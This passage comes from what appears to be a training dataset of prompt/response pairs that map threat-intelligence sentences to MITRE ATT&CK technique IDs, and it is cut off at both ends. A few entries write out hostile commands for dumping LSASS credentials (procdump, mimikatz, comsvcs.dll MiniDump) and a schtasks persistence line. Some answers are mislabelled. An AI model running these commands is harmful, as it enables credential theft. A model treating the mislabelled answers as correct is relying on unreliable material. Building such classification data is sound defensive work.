Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The LSA includes multiple dynamic link libraries associated with various other security functions, all of which run in the context of the LSA Subsystem Service lsass.exe process.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 cleared Windows event logs and other logs produced by tools they used, including system, security, terminal services, remote services, and audit logs.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mimikatz to obtain credentials.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mofang has compressed the ShimRat executable within malicious email attachments.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MegaCortex has used .cmd scripts on the victim's system.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse authentication packages to execute DLLs when the system boots.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TURNEDUP is capable of creating a reverse shell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ngrok can provide DGA for C2 servers through the use of random URL strings that change every 12 hours.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaos provides a reverse shell is triggered upon receipt of a packet with a special string, sent to any port.### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MiniDuke can use DGA to generate new Twitter URLs for C2.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group has used Registry Run keys for persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has used social media platforms to hide communications to C2 servers.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Overwrite a file with all zeros and mark it for deletion on reboot Wiping files with zeros and marking it for deletion on reboot.  Delete files using the DeleteFile() API Load an arbitrary library into its process space### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has avoided detection by naming a malicious binary explorer.exe.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has infected victims using watering holes.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the VBA source code is removed, some tools might even think that there are no macros present.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emissary has the capability to execute the command net localgroup administrators.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PUNCHBUGGY can load a DLL using the LoadLibrary API.### Assistant: T1129: Shared Modules" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,adbupd can run a copy of cmd.exe.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has used an additional filename extension to hide the true file type.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LoudMiner used the ps command to monitor the running processes on the system.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rifdoor has been executed from malicious Excel or Word documents containing macros.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PipeMon communications are RC4 encrypted.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,auditpol.exe may also be used to set audit policies.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used native APIs including GetModuleFileName, lstrcat, CreateFile, and ReadFile.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork also executed a script to enumerate all drives, store them as a list, and upload generated files to the C2 server.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.### Assistant: T1602: Data from Configuration Repository" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS has the ability to identify the username on the compromised host.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Spark has checked the results of the GetKeyboardLayoutList and the language name returned by GetLocaleInfoA to make sure they contain the word “Arabic” before executing.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,USBS Deletes the file created by the USB command to reverse the effect### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This file contains information about the infected system and activity logs.### Assistant: T1052: Exfiltration Over Physical Medium" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has used a custom MBR wiper named BOOTWRECK to render systems inoperable.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After compromising a victim, Poseidon Group lists all running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak also uses XOR with random keys for its communications.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When this method is used in conjunction with Downgrade System Image, one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also install malicious IIS modules to observe and/or modify traffic.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The threat actors used the appcmd command-line tool to unlock and disable the default logging component on the server (systsm.webServer/httplogging) and then delete existing logs from the system (see Figure 4)### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Comnie executes the netstat -ano command.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KeyBoy attempts to collect passwords from browsers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS has established persistence through a scheduled task using the command ”C:\Windows\system32\schtasks.exe” /Create /F /SC DAILY /ST 12:00 /TN MicrosoftEdge /TR “c:\Windows\system32\wscript.exe C:\Windows\temp\Windows.vbe”.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LookBack can shutdown and reboot the victim machine.### Assistant: T1529: System Shutdown/Reboot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DealersChoice makes modifications to open-source scripts from GitHub and executes them on the victim’s machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has modified variables in kernel memory to turn off Driver Signature Enforcement after exploiting vulnerabilities that obtained kernel mode privileges.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the command and control network is a wired Internet connection, an attacker may opt to exfiltrate data using a Bluetooth communication channel.### Assistant: T1011: Exfiltration Over Other Network Medium" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UBoatRAT has used GitHub and a public blog service in Hong Kong for C2 communications.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA505 has used spearphishing emails with malicious attachments to initially compromise victims.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can track key presses with a keylogger module.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RawPOS installs itself as a service to maintain persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLACKCOFFEE has the capability to create a reverse shell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Protocol Tunneling may also be abused by adversaries during Dynamic Resolution.### Assistant: T1572: Protocol Tunneling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Axiom has been observed using SQL injection to gain access to systems.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group has also used a custom version Mimikatz to capture credentials.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has also issued the command net view /domain to a PlugX implant to gather information about remote systems on the network.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group has acquired infrastructure related to their campaigns to act as distribution points and C2 channels.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Registry contains a significant amount of information about the operating system, configuration, software, and security.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IcedID has called ZwWriteVirtualMemory, ZwProtectVirtualMemory, ZwQueueApcThread, and NtResumeThread to inject itself into a remote process.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It is commonly sold on various hacking forums as a keylogger and stealer that can be used to monitor systems and exfiltrate information from those systems### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QUADAGENT has a command to delete its Registry key and scheduled task.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has used kill.bat script to disable security tools.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use the information from System Location Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The attacker made use of Cobalt Strike’s “psexec” lateral movement command to create a Windows service named with a random 16-character string on the target system and execute encoded PowerShell### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Axiom group has used other forms of obfuscation, include commingling legitimate traffic with communications traffic so that network streams appear legitimate.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used Cobalt Strike to encapsulate C2 in DNS traffic.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can mimic HTTP protocol with custom HTTP “verbs” HIDE, ZVVP, and NOP.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,As part of the data reconnaissance phase, Proxysvc grabs the system time to send back to the control server.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CORESHELL downloads another dropper from its C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Darkhotel has used malware that is disguised as a Secure Shell tool.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group has used a JavaScript backdoor that is capable of launching cmd.exe to execute shell commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TURNEDUP is capable of taking screenshots.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used JavaScript files to execute its POWERSTATS payload.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OLDBAIT collects credentials from several email clients.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has obtained valid emails addresses while conducting research against target organizations that were subsequently used in spearphishing campaigns.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Keydnap uses HTTPS for command and control.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Final1stspy obtains victim Microsoft Windows version information and CPU architecture.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has collected the username from a compromised host.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoxCaon has created a working folder for collected files that it sends to the C2 server.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware TangoDelta attempts to terminate various processes associated with McAfee.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team conducted technical reconnaissance of the Parliament of Georgia's official internet domain prior to its 2019 attack.### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some Orz strings are base64 encoded, such as the embedded DLL known as MockDll.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,(Source: Dell SecureWorks) Over a few days' span, the threat actors install remote access tools on additional systems based upon the results of the network reconnaissance### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This behavior will likely not result in elevated privileges since the injected process was spawned from of the injecting process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FALLCHILL can modify file or directory timestamps.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper used shellcode with an XOR algorithm to decrypt a payload.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has used DYEPACK.FOX to manipulate PDF data as it is accessed to remove traces of fraudulent SWIFT transactions from the data displayed to the end user.### Assistant: T1565: Data Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Packet::getData decrypts the received payload and Converter::outString descrambles the result### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some Felismus samples use a custom encryption method for C2 traffic that utilizes AES and multiple keys.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLUELIGHT can use different cloud providers for its C2.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Javali can use large obfuscated libraries to hinder detection and analysis.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can use Windows API functions such as WriteFile, CloseHandle, and GetCurrentHwProfile during its collection and file storage operations.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The schtasks can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, some cryptocurrency mining malware kills off processes for competing malware to ensure it’s not competing for resources.### Assistant: T1496: Resource Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSInfo queries the registry to look for information about Terminal Services.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An APT19 Port 22 malware variant registers itself as a service.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The adversary can then claim that they forgot their password in order to make changes to the domain registration.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 6 Relational diagram of artifacts  We created a timeline of the activity based off the data we collected, and found that the attack dates were tightly clustered into two waves in mid- to late-October and in mid-November as we see in Figure 7 using the timestamps from Table 3### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LiteDuke can enumerate the account name on a targeted system.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 4: Downloading second stage Seminar.rtf The downloaded Seminar.rtf contains an embedded binary file that is dropped in %temp% via Equation Editor executable### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windshift has used compromised websites to register custom URL schemes on a remote system.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly downloaded tools from a remote server after they were inside the victim network.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dtrack packs collected data into a password protected archive.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It also extracted command-line arguments and individual arguments from the running MsBuild.exe process to identify the directory path of the Orion software Visual Studio solution.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This activity may be used to collect or relay authentication materials.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TajMahal can set the KeepPrintedJobs attribute for configured printers in SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\Printers to enable document stealing.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KEYMARBLE has a command to search for files on the victim’s machine.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avaddon bypasses UAC using the CMSTPLUA COM interface.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These files are then transmitted to a threat actor, often over commonly open ports 80 and 443 (HTTP and HTTPS)### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoomBox can decrypt AES-encrypted files downloaded from C2.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pay2Key can remove its log file from disk.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkHydrus has sent malware that required users to hit the enable button in Microsoft Excel to allow an .iqy file to be downloaded.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has used base64 encoding and ECDH-P256 encryption for scripts and files.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about network trusts may also be exposed to adversaries via online or other accessible data sets .### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADCALL encrypts C2 traffic using an XOR/ADD cipher.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with Modify System Image to load a modified image on device startup or reset.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windows Background Intelligent Transfer Service is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model .### Assistant: T1197: BITS Jobs" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleJeus has collected the victim host information after infection.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Its developer used the open source Invoke-Obfuscation tool to obfuscate this PowerShell script, specifically using the COMPRESS technique offered by Invoke-Obfuscation### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MS\d{2}-\d{3}### Assistant: T1210: Exploitation of Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Molerats has delivered compressed executables within ZIP files to victims.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has used cmd.exe /c to execute files.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZeroT has obfuscated DLLs and functions using dummy API calls inserted between real instructions.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy gets the username from the system.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some Orz versions have an embedded DLL known as MockDll that uses Process Hollowing and regsvr32 to execute another payload.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has been known to remove indicators of compromise from tools.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Skidmap has the ability to download files on an infected host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cadelspy has the ability to steal information about printers and the documents sent to printers.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proxysvc searches the local system and gathers data.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The author of GravityRAT submitted samples to VirusTotal for testing, showing that the author modified the code to try to hide the DDE object in a different part of the document.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to get a listing of accounts on a system or within an environment.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes Dynamic-link Library Injection, allowing for arbitrary code execution .### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackdoorDiplomacy has executed DLL search order hijacking.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Depending on the version of Windows, an adversary may take advantage of these features in different ways.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proxysvc collects the OS version, country name, MAC address, computer name, physical memory statistics, and volume information for all drives on the system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Each running process has its own directory, which includes memory mappings.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ChChes collects the victim hostname, window resolution, and Microsoft Windows version.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HELLOKITTY has the ability to enumerate network resources.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may carry out malicious operations using a virtual instance to avoid detection.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Filename SHA256 Description 7za.exe dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229 7-Zip 17.01 beta hb.exe 3ca3a957c526eaeabcf17b0b2cd345c0fffab549adfdf04470b6983b87f7ec62 Hobocopy nbt.exe c9d5dc956841e000bfd8762e2f0b48b66c79b79500e894b4efa7fb9ba17e4e9e nbtscan 1.0.35 rx.exe a6a0fbfee08367046d3d26fb4b4cf7779f7fb6eaf7e60e1d9b6bf31c5be5b63e IntelliAdmin Remote Execute v1.0 tardigrade.exe fe1b011fe089969d960d2dce2a61020725a02e15dbc812ee6b6ecc6a98875392 Tardigrade application### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,8 Upload the TPX498.dat file, which contains the list of collected keystrokes### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZIRCONIUM has exploited CVE-2017-0005 for local privilege escalation.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,S-Type may create a .lnk file to itself that is saved in the Start menu folder.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These service processes may automatically execute specific binaries as part of their functionality or to perform other actions.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 used a ransomware called Encryptor RaaS to encrypt files on the targeted systems and provide a ransom note to the user.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Clop can kill several processes and services related to backups and security solutions.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TINYTYPHON searches through the drive containing the OS, then all drive letters C through to Z, for documents matching certain extensions.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Network Security appliances such as NGFW, NGIPS, and Meraki MX can detect malicious activity associated with this threat### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They may create a new shortcut as a means of indirection that may use Masquerading to look like a legitimate program.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA505 has used the tool EmailStealer to steal and send lists of e-mail addresses to a remote server.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has exfiltrated data over FTP separately from its primary C2 channel over DNS.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KGH_SPY can enumerate files and directories on a compromised host.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LoJax is a UEFI BIOS rootkit deployed to persist remote access software on some targeted systems.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LoudMiner also added plist files in /Library/LaunchDaemons with KeepAlive set to true, which would restart the process if stopped.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAFNIUM has used ASCII encoding for C2 traffic.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ke3chang has used keyloggers.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM can obtain the victim time zone.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete takes photos from the computer’s web camera.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Molerats actors obtained a list of active processes on the victim and sent them to C2 servers.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are examples of antivirus software being targeted by persistent threat groups to avoid detection.### Assistant: T1211: Exploitation for Defense Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, on the target host use procdump: * procdump -ma lsass.exe lsass_dump Locally, mimikatz can be run using: * sekurlsa::Minidump lsassdump.dmp * sekurlsa::logonPasswords Built-in Windows tools such as comsvcs.dll can also be used: * rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full Windows Security Support Provider DLLs are loaded into LSSAS process at system start.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zeus Panda searches for specific directories on the victim’s machine.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LookBack can list running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has used TCP for C2 communications.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The C2 server response to a beacon sent by a variant of Emissary contains a 36-character GUID value that is used as an encryption key for subsequent network communications.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MegaCortex loads injecthelper.dll into a newly created rundll32.exe process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard was executed through the kubelet API run command and by executing commands on running containers.### Assistant: T1609: Container Administration Command" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE has the ability to steal credentials from web browsers including Internet Explorer, Opera, Yandex, and Chrome.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Spearphishing attachment is a specific variant of spearphishing.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conti has the ability to discover hosts on a target network.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,YAHOYAH uses HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DNS information may also be exposed to adversaries via online or other accessible 